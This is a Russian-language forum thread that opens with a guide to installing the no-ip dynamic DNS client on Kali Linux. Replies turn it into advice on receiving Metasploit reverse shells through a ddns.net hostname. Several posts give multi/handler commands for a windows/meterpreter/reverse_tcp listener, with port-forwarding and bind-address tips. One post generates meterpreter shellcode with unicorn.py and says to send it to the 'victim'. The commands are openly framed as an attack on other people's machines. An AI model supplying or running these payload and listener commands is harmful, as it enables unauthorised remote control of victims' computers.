Всем привет, часто в ветке форума встречаю, что делать если у меня нет белого ip? Один из вариантов это использовать сервис no-ip.Сейчас я постараюсь подробно рассказать как можно его установить в среде всеми нами любимого kali, и так поехали!!
Самое первое это заходим по адресу http://www.noip.com проходим регистрацию.
далее на этом же сайте скачиваем клиент.

https://forum.antichat.xyz/attachments/4766277/img_23fb24649e.png

после того как скачали,копируем в удобное место, распаковываем, и переходим в директорию с распакованным пакетом.

https://forum.antichat.xyz/attachments/4766277/img_45fae8d8c7.png

Далее командой make install запускаем установку данного пакета.

в процессе указываем свой почтовый ящик,который вводили при регистрации no-ip.
пароль,а также выбираем интервал обновления,я выбрал 5 минут. по умолчанию 30.
Так же у нас спросят Do you wish to run something at successful update?[N] (y/N) - Нажмите "y" чтобы обновить хост сейчас.

https://forum.antichat.xyz/attachments/4766277/img_1212589c37.png

Запускается no-ip командой командой no-ip2

https://forum.antichat.xyz/attachments/4766277/img_6f1738d5e2.png

Вот и все, как видите ничего сложно.всем спасибо за внимания и удачи.

m0tion сказал(а):

Можно устанавливать не обязательно на Linux. Я например на роутере(Mikrotik) скрипт поставил.


да конечно, здесь я описал один из вариантов..

Наконец-то, кто то это описал)) Все никак руки не доходили. Спасибо за статью.

fvn сказал(а):

Может стоит изменить название на "что делать если ip динамический". В случае серых адресов No-Ip не поможет.


Вы уверены в своем утверждении? Как раз в этом примере что я показывал, no-ip стоит на машине с адресом 192.168.... после NAT, адрес самого роутера в сети 10.10....(что и есть серый). Все прекрасно работает!

возможно с паролем или логином ошиблись

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dnsимя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд

Код:



use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j

~~DarkNode~~ сказал(а):

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dnsимя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд

Код:



use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j


И не забыть пробросить нужные порты в роутере .

у вас белый статический ip, у многих такое отсутствует...

DoberGroup сказал(а):

А как Вы через провайдерский NAT, простите, порты пробрасываете? DDNS это ведь не самоцель, это вспомогательный инструмет


Я пробрасываю порты только на своем роутере.

я не смотрел топологию провайдера..хотя интерес вы подогрели,нужно на досуге глянуть.

Спасибо, очень подробный мануал.

pazle сказал(а):

Пробую эксплойт с такими настройками (предварительно порт на машине открыл):

Код:



set> IP address for the payload listener (LHOST):80.200.150.250
set:payloads> Port to connect back on [443]:443
All good! The directories were created.
Затем пробую установить сессию и вылезает ошибка:
[-] Handler failed to bind to 80.200.150.250:443:- -
[-] Handler failed to bind to 0.0.0.0:443:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).
msf exploit(handler) >


Попробуйте добавить строчку следующего содержания
set ReverseListenerBinAddress (локальный ip)

Я использую ddclient, работает за nat и не только с no-ip. Гибкий в настройках. Если кому необходимо выложу конфигурации.

for(i=0;i<225;i++); сказал(а):

после установки программы я указал все дынные, оно работает!!Скажите после перезагрузки компа заново нужно будет вводить логин и пароль через консоль???


после установки программы я указал все дынные, оно работает!!Скажите после перезагрузки компа заново нужно будет вводить логин и пароль через консоль??? и как пробросить роутер Zyxel Keenetic Lite III можно инструкцию???

Если не добавили сервис в автозагрузку то да.

~~DarkNode~~ сказал(а):

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dnsимя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP


А вот тут вот по подробнее плиз

Для создания полезной нагрузки я юзаю это https://codeby.net/threads/bystryj-sposob-poluchit-meterpreter.58440/ (https://forum.antichat.xyz/threads/558440/)

Здравствуйте.
при вводе команд выдает ошибки
error runing command: Rex:: Timeouterror Operation timed out. С чем это может быть связано?
Особенно когда делаю скрины или же пытаюсь что либо загрузить.
и Сессия долго открывается минут 10-15
пользуюсь no ip




Pushkinmazila сказал(а):

А вот тут вот по подробнее плиз

Для создания полезной нагрузки я юзаю это https://codeby.net/threads/bystryj-sposob-poluchit-meterpreter.58440/ (https://forum.antichat.xyz/threads/558440/)

Для получения шелкода

Код:



python unicorn.py windows/meterpreter/reverse_tcp test.ddns.net 443


Шелкод бросаем "жертве"
и от руки в Метасплоите пишем.

Код:



use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST test.ddns.net
set LPORT 443
set REVERSELISTENERBINDADDRESS 192.168.88.5
exploit -j


Ну и порт на роутере перебросить на локальный адрес.

jaguar сказал(а):

No-IP
и файл попадает в автозагрузку?


как он попадет если вы не внесли его, чудес не бывает..)